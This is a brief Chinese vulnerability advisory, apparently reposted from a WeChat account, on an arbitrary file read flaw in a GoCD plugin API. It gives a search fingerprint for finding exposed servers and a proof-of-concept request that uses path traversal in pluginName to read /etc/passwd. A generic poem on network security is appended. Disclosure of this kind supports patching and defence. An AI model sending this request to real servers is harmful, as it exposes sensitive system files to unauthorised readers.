GoCD plugin 任意文件读取漏洞

漏洞描述：

GoCD plugin aip 参数中的 pluginName 参数存在任意文件读取漏洞，导致攻击者可以获取服务器中的任意敏感信息。

漏洞影响：

GoCD

网络测绘：

title="Create a pipeline - Go"

漏洞复现：

主页面

验证poc：

/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd

美文推送：

在无尽的网络空间里，

隐藏着无数个危险的窝点，

黑客和病毒在其中肆虐，

企图入侵我们的网络系统。

保护我们的数据和信息，

网络安全就显得尤为重要，

我们需要严密的防护措施，

才能保证信息安全不受威胁。

加密技术是我们的守护神，

网络防火墙是我们的城墙，

定期更新软件是我们的武器，

网络安全意识是我们的盾牌。

让我们共同来守护网络，

保护我们的网络安全，

防止黑客和病毒的入侵，

让网络世界更加美好安全。

文章来源：http://wiki.peiqi.tech/wiki/webserver/GoCD/GoCD%20plugin%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%20CVE-2021-43287.html

原文始发于微信公众号（White OWL）：GoCD plugin 任意文件读取漏洞